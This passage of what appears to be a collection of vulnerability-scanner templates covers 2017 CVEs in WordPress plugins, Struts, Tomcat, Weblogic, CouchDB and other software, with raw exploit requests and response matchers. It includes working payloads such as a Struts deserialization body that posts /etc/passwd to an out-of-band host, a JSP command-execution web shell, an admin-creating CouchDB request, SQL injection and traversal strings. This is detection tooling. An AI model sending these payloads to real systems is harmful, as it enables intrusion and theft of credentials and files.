HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/qards/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["console.log"]}]}]},{"id":"CVE-2017-18530","info":{"name":"Rating by BestWebSoft < 0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/rating-bws/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Rating by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18558","info":{"name":"Testimonials by BestWebSoft < 0.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-testimonials/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Testimonials by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-9805","info":{"name":"Apache Struts2 S2-052 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/struts2-rest-showcase/orders/3","{{BaseURL}}/orders/3"],"body":"<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n        <dataHandler>\n          <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n            <is class=\"javax.crypto.CipherInputStream\">\n              <cipher class=\"javax.crypto.NullCipher\">\n                <initialized>false</initialized>\n                <opmode>0</opmode>\n                <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n                  <iter class=\"javax.imageio.spi.FilterIterator\">\n                    <iter class=\"java.util.Collections$EmptyIterator\"/>\n                    <next class=\"java.lang.ProcessBuilder\">\n                      <command>\n                        <string>wget</string>\n                        <string>--post-file</string>\n                        <string>/etc/passwd</string>\n              <string>{{interactsh-url}}</string>\n                      </command>\n                      <redirectErrorStream>false</redirectErrorStream>\n                    </next>\n                  </iter>\n                  <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>asdasd</name>\n                  </filter>\n                  <next class=\"string\">asdasd</next>\n                </serviceIterator>\n                <lock/>\n              </cipher>\n              <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n              <ibuffer></ibuffer>\n              <done>false</done>\n              <ostart>0</ostart>\n              <ofinish>0</ofinish>\n              <closed>false</closed>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n</map>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["Debugging information","com.thoughtworks.xstream.converters.collections.MapConverter"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-14849","info":{"name":"Node.js <8.6.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/../../../a/../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12635","info":{"name":"Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation","severity":"critical"},"requests":[{"raw":["PUT /_users/org.couchdb.user:poc HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\n\n{\n  \"type\": \"user\",\n  \"name\": \"poc\",\n  \"roles\": [\"_admin\"],\n  \"roles\": [],\n  \"password\": \"123456\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","Location:"]},{"type":"word","part":"body","words":["org.couchdb.user:poc","conflict","Document update conflict"]},{"type":"status","status":[201,409]}]}]},{"id":"CVE-2017-18542","info":{"name":"Zendesk Help Center by BestWebSoft < 1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/zendesk-help-center/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Zendesk Help Center by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-11629","info":{"name":"FineCMS <=5.0.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>p\u4e0d\u5b58\u5728"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12138","info":{"name":"XOOPS Core 2.5.8 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /user.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login\n","GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2017-11444","info":{"name":"Subrion CMS <4.1.5.10 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%27{{hex_string}}%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{string}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12617","info":{"name":"Apache Tomcat - Remote Code Execution","severity":"high"},"requests":[{"raw":["PUT /{{randstr}}.jsp/ HTTP/1.1\nHost: {{Hostname}}\n\n<% out.println(\"CVE-2017-12617\");%>\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2017-12617"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12615","info":{"name":"Apache Tomcat Servers - Remote Code Execution","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/poc.jsp/"],"body":"<%@ page import=\"java.util.*,java.io.*\"%>\n<%\nif (request.getParameter(\"cmd\") != null) {\n        out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n        Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n        OutputStream os = p.getOutputStream();\n        InputStream in = p.getInputStream();\n        DataInputStream dis = new DataInputStream(in);\n        String disr = dis.readLine();\n        while ( disr != null ) {\n                out.println(disr);\n                disr = dis.readLine();\n                }\n        }\n%>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-3132","info":{"name":"Fortinet FortiOS < 5.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var action = '</script><script>alert(document.domain)</script><script>"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12637","info":{"name":"SAP NetWeaver Application Server Java 7.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["WEB-INF","META-INF"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-3506","info":{"name":"Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,\nContent-Type: text/xml;charset=UTF-8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header>\n    <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n      <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n        <void id=\"url\" class=\"java.net.URL\">\n          <string>http://{{interactsh-url}}</string>\n        </void>\n        <void idref=\"url\">\n          <void id=\"stream\" method =\"openStream\"/>\n        </void>\n      </java>\n    </work:WorkContext>\n    </soapenv:Header>\n  <soapenv:Body/>\n</soapenv:Envelope>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-18516","info":{"name":"LinkedIn by BestWebSoft < 1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-linkedin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"LinkedIn by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-9506","info":{"name":"Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-5521","info":{"name":"NETGEAR Routers - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["right\">Router\\s*Admin\\s*Username<","right\">Router\\s*Admin\\s*Password<"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18532","info":{"name":"Realty by BestWebSoft < 1.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/realty/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Realty by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-1000170","info":{"name":"WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"],"body":"dir=%2Fetc%2F&onlyFiles=true","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<li class='file ext_passwd'>","<a rel='/passwd'>passwd</a></li>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18565","info":{"name":"Updater by BestWebSoft < 1.35 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/updater/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Updater by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18537","info":{"name":"Visitors Online by BestWebSoft < 1.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/visitors-online/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Visitors Online by\")"],"condition":"and"}]}]},{"id":"CVE-2017-15647","info":{"name":"FiberHome Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000028","info":{"name":"Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd","{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-5982","info":{"name":"Kodi 17.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12544","info":{"name":"HPE System Management - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var prodName = '';prompt`document.domain`;//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-8229","info":{"name":"Amcrest IP Camera Web Management - Data Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/Sha1Account1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DevInformation","SerialID"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12149","info":{"name":"Jboss Application Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /invoker/JMXInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/EJBInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/readonly HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["JBoss","ClassCastException"],"condition":"and","case-insensitive":true},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2017-18566","info":{"name":"User Role by BestWebSoft < 1.5.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/user-role/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"User Role by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18491","info":{"name":"Contact Form by BestWebSoft < 4.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/contact-form-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Contact Form by\")"],"condition":"and"}]}]},{"id":"CVE-2017-5868","info":{"name":"OpenVPN Access Server 2.1.4 - CRLF Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/__session_start__/%0aSet-Cookie:%20crlfinjection=1;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["^Set-Cookie: crlfinjection=1;"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2017-14186","info":{"name":"FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location=decodeURIComponent(\"javascript%3Aalert%28document.domain%29\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17451","info":{"name":"WordPress Mailster <=1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-mailster/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP Mailster ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11586","info":{"name":"FineCMS <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?s=member&c=login&m=index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nback=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1\n","GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","part":"header","regex":["Refresh:(.*)url=http:\\/\\/interact\\.sh"]}]}]},{"id":"CVE-2017-1000163","info":{"name":"Phoenix Framework - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?redirect=/\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2017-18528","info":{"name":"PDF & Print by BestWebSoft < 1.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/pdf-print/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"PDF & Print by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-17562","info":{"name":"Embedthis GoAhead <3.6.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"endpoint":["admin","apply","non-CA-rev","cgitest","checkCookie","check_user","chn/liveView","cht/liveView","cnswebserver","config","configure/set_link_neg","configure/swports_adjust","eng/liveView","firmware","getCheckCode","get_status","getmac","getparam","guest/Login","home","htmlmgr","index","index/login","jscript","kvm","liveView","login","login.asp","login/login","login/login-page","login_mgr","luci","main","main-cgi","manage/login","menu","mlogin","netbinary","nobody/Captcha","nobody/VerifyCode","normal_userLogin","otgw","page","rulectl","service","set_new_config","sl_webviewer","ssi","status","sysconf","systemutil","t/out","top","unauth","upload","variable","wanstatu","webcm","webmain","webproc","webscr","webviewLogin","webviewLogin_m64","webviewer","welcome"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["environment variable","display library search paths"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18529","info":{"name":"PromoBar by BestWebSoft < 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/promobar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"PromoBar by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18490","info":{"name":"Contact Form Multi by BestWebSoft < 1.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/contact-form-multi/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Contact Form Multi by\")"],"condition":"and"}]}]},{"id":"CVE-2017-18494","info":{"name":"Custom Search by BestWebSoft < 1.36 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-search-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Custom Search by\")"],"condition":"and"}]}]},{"id":"CVE-2017-3528","info":{"name":"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"],"matchers":[{"type":"word","part":"body","words":["noresize src=\"/\\interact.sh?configName="]}]}]},{"id":"CVE-2017-12542","info":{"name":"HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/v1/AccountService/Accounts"],"headers":{"Connection":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["iLO User"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14524","info":{"name":"OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2017-15363","info":{"name":"Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<?php","'host'","'database'","'extConf'","'debug'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18556","info":{"name":"Google 